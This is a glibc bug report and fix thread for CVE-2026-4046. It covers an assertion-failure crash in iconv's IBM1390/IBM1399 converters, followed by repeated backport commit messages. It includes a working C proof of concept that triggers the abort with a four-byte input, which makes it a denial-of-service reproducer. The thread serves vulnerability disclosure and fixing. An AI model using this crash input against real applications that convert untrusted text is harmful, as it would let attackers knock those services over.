The IBM1390 and IBM1399 encodings, which have the "combined" attribute, can cause glibc to hit an assertion failure. A PoC demonstrating the bug is attached below. Compile and run it, and libc reports a "../iconv/skeleton.c:594: gconv: Assertion `outbuf == outerr' failed." error.

This was observed on Arch Linux with glibc version 2.43+r5+g856c426a7534. I checked the git log and the files: `iconvdata/ibm139{0,9}.{c,h}` have stayed unchanged since the very first patch.

Here is what I found digging into the code:

1. SO COMBINED_WORD SI produces 2 internal words in outbuf in FROM_LOOP (SO and SI take no space);
2. TO_LOOP consumes only one internal word (the user outbuf is 4 bytes, while the 2 internal words (8 bytes) need 6 bytes once converted to UTF-8, so outerr = outbuf + 4); outerr != outbuf, so a rerun is needed;
3. In the rerun, FROM_LOOP, with its `outend` restricted to outerr, makes the combined-word logic in LOOP return __GCONV_FULL_OUTPUT: a combined word atomically needs space for 2 internal words, that is, 8 bytes, so outbuf is still outstart. Hence outbuf != outerr in this rerun, which triggers the assertion failure.

I wonder whether this is a security bug (DoS): an application affected by CVE-2024-2961 could also be affected by this bug and be aborted by the assertion failure. Since a combined word takes 2 bytes in IBM139x and can expand to 6 bytes in UTF-8, a malicious input could quickly fill the output space and trigger this bug.

---

#define _GNU_SOURCE
#include <errno.h>
#include <iconv.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static void
die (const char *msg)
{
  perror (msg);
  exit (1);
}

int
main (int argc, char **argv)
{
  setvbuf (stdout, NULL, _IONBF, 0);
  setvbuf (stderr, NULL, _IONBF, 0);

  const char *fromcode = argc >= 2 ? argv[1] : "IBM1390";
  const char *tocode = argc >= 3 ? argv[2] : "UTF-8";
  size_t outsz = argc >= 4 ? strtoul (argv[3], NULL, 0) : 4;

  /* IBM13xx combined-character example: 0xECB5 is a DBCS code that
     expands to two UCS-4 code points (U+304B U+309A).  */
  unsigned char input[] = { 0x0e, 0xec, 0xb5, 0x0f };
  char *inptr = (char *) input;
  size_t inleft = sizeof (input);

  if (outsz == 0)
    outsz = 1;
  char *outbuf = malloc (outsz);
  if (!outbuf)
    die ("malloc");
  memset (outbuf, 0x41, outsz);
  char *outptr = outbuf;
  size_t outleft = outsz;

  fprintf (stderr, "[*] iconv %s -> %s, in=0e(SO) ecb5 0f(SI), outsz=%zu\n",
           fromcode, tocode, outsz);

  iconv_t cd = iconv_open (tocode, fromcode);
  if (cd == (iconv_t) -1)
    die ("iconv_open");

  errno = 0;
  /* iconv returns size_t; (size_t) -1 prints as -1 through long.  */
  long rc = iconv (cd, &inptr, &inleft, &outptr, &outleft);
  fprintf (stderr, "[*] iconv rc=%ld errno=%d (%s) inleft=%zu outleft=%zu\n",
           rc, errno, strerror (errno), inleft, outleft);

  fwrite (outbuf, 1, outsz - outleft, stdout);

  iconv_close (cd);
  free (outbuf);
  return 0;
}
Yes, this is a security bug. Crashes in conversions to UTF-8 can make mail folders inaccessible in mutt, for example.
I think I have a fix for this; I just need to write a proper test case for it.
Fix with test case posted: [PATCH v2] Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046) <https://inbox.sourceware.org/libc-alpha/lhucy0b6l2w.fsf@oldenburg.str.redhat.com/>
The master branch has been updated by Florian Weimer <fw@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=d6f08d1cf027f4eb2ba289a6cc66853722d4badc

commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)

    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.

    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.

    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.

    This fixes bug 33980.

    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
Fixed for 2.44 so far.
The release/2.43/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=8362e8ce10b24068bacc19552c128dd10e082fd9

commit 8362e8ce10b24068bacc19552c128dd10e082fd9
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)

    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.

    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.

    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.

    This fixes bug 33980.

    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)

The release/2.42/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f13c1bb0f97fbc12a6ba1ab5669ce561ea32b80a

commit f13c1bb0f97fbc12a6ba1ab5669ce561ea32b80a
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)

    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.

    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.

    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.

    This fixes bug 33980.

    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)

The release/2.41/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=61737f43b1f0d9f64a6f16649625476b70f9f4d3

commit 61737f43b1f0d9f64a6f16649625476b70f9f4d3
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)

    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.

    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.

    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.

    This fixes bug 33980.

    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)

The release/2.40/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f82c16babf26c9d4c46399111ed8383d84c93d67

commit f82c16babf26c9d4c46399111ed8383d84c93d67
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)

    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.

    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.

    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.

    This fixes bug 33980.

    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)

The release/2.39/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=3e13579841429c56ad5497e6562c47067d8a53b0

commit 3e13579841429c56ad5497e6562c47067d8a53b0
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)

    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.

    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.

    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.

    This fixes bug 33980.

    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)

The release/2.38/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=55b2c0820d47b5983b4210f96991f87f11ebe7c5

commit 55b2c0820d47b5983b4210f96991f87f11ebe7c5
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)

    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.

    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.

    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.

    This fixes bug 33980.

    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)

The release/2.37/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ba37b7465239b5496b013dd5279b495a4a0f4eb5

commit ba37b7465239b5496b013dd5279b495a4a0f4eb5
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)

    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.

    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.

    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.

    This fixes bug 33980.

    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)

The release/2.36/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=7abd383d439dc348419a9fd526d42ea4591e8aaf

commit 7abd383d439dc348419a9fd526d42ea4591e8aaf
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)

    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.

    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.

    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.

    This fixes bug 33980.

    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)